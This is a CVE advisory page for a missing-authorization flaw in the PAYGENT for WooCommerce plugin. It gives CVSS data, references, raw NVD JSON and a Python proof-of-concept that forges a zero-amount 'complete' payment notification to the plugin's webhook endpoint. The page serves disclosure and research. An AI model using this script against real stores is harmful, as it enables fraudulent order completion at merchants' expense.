Security Vulnerability Report
中文
CVE-2025-14078 CVSS 5.3 MEDIUM

CVE-2025-14078

Published: 2026-01-17 09:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The PAYGENT for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.4.6. This is due to missing authorization checks on the paygent_check_webhook function combined with the paygent_permission_callback function unconditionally returning true on line 199. This makes it possible for unauthenticated attackers to manipulate payment callbacks and modify order statuses by sending forged payment notifications via the `/wp-json/paygent/v1/check/` endpoint.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PAYGENT for WooCommerce < 2.4.6(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-14078 PoC - Unauthenticated Order Status Manipulation # Target: WordPress site with PAYGENT WooCommerce plugin <= 2.4.6 # Endpoint: /wp-json/paygent/v1/check/ def exploit_paygent_unauthorized_access(target_url, order_id): """ Exploit for Missing Authorization vulnerability in PAYGENT for WooCommerce Allows unauthenticated attackers to manipulate order status via forged payment notifications """ endpoint = f"{target_url.rstrip('/')}/wp-json/paygent/v1/check/" # Forge payment notification payload # Attacker can set arbitrary order status values payload = { "order_id": order_id, "payment_status": "complete", # Forge successful payment "payment_id": "MALICIOUS-" + str(order_id), "amount": 0, "currency": "JPY" } headers = { "Content-Type": "application/json", "User-Agent": "PAYJENT Payment Gateway/1.0" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) print(f"[*] Target: {target_url}") print(f"[*] Endpoint: {endpoint}") print(f"[*] Payload: {json.dumps(payload)}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] Exploit successful - Order status may have been modified") else: print("[-] Exploit may have failed") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Usage example # target = "https://vulnerable-wordpress-site.com" # order_id = 12345 # exploit_paygent_unauthorized_access(target, order_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14078", "sourceIdentifier": "[email protected]", "published": "2026-01-17T09:15:51.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PAYGENT for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.4.6. This is due to missing authorization checks on the paygent_check_webhook function combined with the paygent_permission_callback function unconditionally returning true on line 199. This makes it possible for unauthenticated attackers to manipulate payment callbacks and modify order statuses by sending forged payment notifications via the `/wp-json/paygent/v1/check/` endpoint."}, {"lang": "es", "value": "El plugin PAYGENT para WooCommerce para WordPress es vulnerable a Falta de Autorización en todas las versiones hasta la 2.4.6, inclusive. Esto se debe a la falta de comprobaciones de autorización en la función paygent_check_webhook, combinada con el hecho de que la función paygent_permission_callback devuelve 'true' incondicionalmente en la línea 199. Esto hace posible que atacantes no autenticados manipulen las devoluciones de llamada de pago y modifiquen los estados de los pedidos enviando notificaciones de pago falsificadas a través del endpoint '/wp-json/paygent/v1/check/'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/tags/2.4.2/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/trunk/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432342%40woocommerce-for-paygent-payment-main&new=3432342%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433179%40woocommerce-for-paygent-payment-main&new=3433179%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9de42bd9-a1d2-48f2-a594-4013a9490e25?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.